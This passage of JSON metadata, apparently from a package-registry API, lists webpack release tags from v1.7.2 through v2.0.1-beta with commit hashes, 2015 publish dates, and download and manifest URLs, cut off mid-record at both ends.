-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"